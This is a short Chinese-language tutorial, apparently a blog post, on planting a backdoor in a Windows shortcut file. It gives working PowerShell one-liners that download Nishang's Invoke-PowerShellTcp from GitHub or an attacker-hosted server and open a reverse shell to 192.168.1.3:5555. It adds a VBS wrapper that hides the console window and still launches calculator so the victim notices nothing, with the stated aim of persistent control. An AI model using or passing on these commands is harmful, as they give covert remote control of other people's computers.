快捷方式是Windows提供的一种快速启动程序、打开文件或文件夹的方法。它是应用程序的快速连接。 快捷方式的一般扩展名为*.lnk。快捷方式为我们带来了方便快捷,同时也为渗透人员带来了一个很好的留后门方式。
我们创建一个计算器的快捷方式,如图:
image.png
只需要将目标指向的运用程序替换为后门即可,
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.3 -port 5555
但是快捷方式目标栏是有字符数量限制的,我们可以自己搭建一个,或者使用短网址
powershell IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.3 -port 5555
测试成功,但是却发现双击图标之后,桌面会出现黑框,这肯定会被发现,我们可以使用vbs来规避这个问题。
将快捷方式目标指向我们的vbs文件
C:\windows\debug\ff.vbs
Set test = CreateObject("Wscript.Shell")
test.Run "calc.exe"
test.Run "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.3 -port 5555",vbhid
这样即实现了后门,又规避了黑框,同时也会调用快捷方式指向原始程序,使得用户不会发现,达到持续化控制的目的。
注意,win10环境将目标替换之后,图标会随之改变,右键属性更改图标即可。
网友评论